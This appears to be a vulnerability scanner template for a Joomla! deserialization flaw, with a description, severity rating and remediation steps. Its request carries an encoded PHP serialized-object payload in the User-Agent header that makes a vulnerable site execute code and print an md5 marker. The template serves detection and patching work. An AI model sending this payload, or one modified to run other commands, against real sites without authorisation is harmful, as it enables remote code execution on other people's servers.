id: joomla-unserialized-user_agent
info:
  name: joomla deserialization vulnerability
  author:
  - 折跃
  description: |-
    Joomla! Deserialization Vulnerability
    Joomla! is an open source content management system (CMS).

    A deserialization vulnerability exists in Joomla! that allows an attacker to execute code.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. Do not put user input or user-controllable parameters directly into the deserialization operation.
    2. Before entering the deserialization function, limit the parameters and filter them.
    3. Encrypt and sign the deserialized data, and ensure that decryption occurs before desequencing.
    4. Add authentication and authorization to the deserialization interface
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - contains(body_2,'fb0b32aeafac4591c7ae6d5e58308344')
  raw:
  - |
    GET / HTTP/1.1
    Host: {{Hostname}}
    User-Agent: {{hex_decode("N2Q1ZjVmNzQ2NTczNzQ3YzRmM2EzMjMxM2EyMjRhNDQ2MTc0NjE2MjYxNzM2NTQ0NzI2OTc2NjU3MjRkNzk3MzcxNmM2OTIyM2EzMzNhN2I3MzNhMzIzYTIyNjY2MzIyM2I0ZjNhMzEzNzNhMjI0YTUzNjk2ZDcwNmM2NTcwNjk2NTQ2NjE2Mzc0NmY3Mjc5MjIzYTMwM2E3YjdkNzMzYTMyMzEzYTIyNWMzMDVjMzA1YzMwNjQ2OTczNjM2ZjZlNmU2NTYzNzQ0ODYxNmU2NDZjNjU3MjczMjIzYjYxM2EzMTNhN2I2OTNhMzAzYjYxM2EzMjNhN2I2OTNhMzAzYjRmM2EzOTNhMjI1MzY5NmQ3MDZjNjU1MDY5NjUyMjNhMzUzYTdiNzMzYTM4M2EyMjczNjE2ZTY5NzQ2OTdhNjUyMjNiNGYzYTMyMzAzYTIyNGE0NDYxNzQ2MTYyNjE3MzY1NDQ3MjY5NzY2NTcyNGQ3OTczNzE2YzIyM2EzMDNhN2I3ZDczM2EzODNhMjI2NjY1NjU2NDVmNzU3MjZjMjIzYjczM2EzNDM0M2EyMjY0Njk2NTI4NmQ2NDM1MjgzMjMzMzMzMzMzMzMyOTI5M2I0YTQ2NjE2Mzc0NmY3Mjc5M2EzYTY3NjU3NDQzNmY2ZTY2Njk2NzI4MjkzYjY1Nzg2OTc0M2IyMjNiNzMzYTMxMzkzYTIyNjM2MTYzNjg2NTVmNmU2MTZkNjU1ZjY2NzU2ZTYzNzQ2OTZmNmUyMjNiNzMzYTM2M2EyMjYxNzM3MzY1NzI3NDIyM2I3MzNhMzUzYTIyNjM2MTYzNjg2NTIyM2I2MjNhMzEzYjczM2EzMTMxM2EyMjYzNjE2MzY4NjU1ZjYzNmM2MTczNzMyMjNiNGYzYTMyMzAzYTIyNGE0NDYxNzQ2MTYyNjE3MzY1NDQ3MjY5NzY2NTcyNGQ3OTczNzE2YzIyM2EzMDNhN2I3ZDdkNjkzYTMxM2I3MzNhMzQzYTIyNjk2ZTY5NzQyMjNiN2Q3ZDczM2EzMTMzM2EyMjVjMzA1YzMwNWMzMDYzNmY2ZTZlNjU2Mzc0Njk2ZjZlMjIzYjYyM2EzMTNiN2RmMA==")}}
  - |
    GET / HTTP/1.1
    Host: {{Hostname}}
  req-condition: true
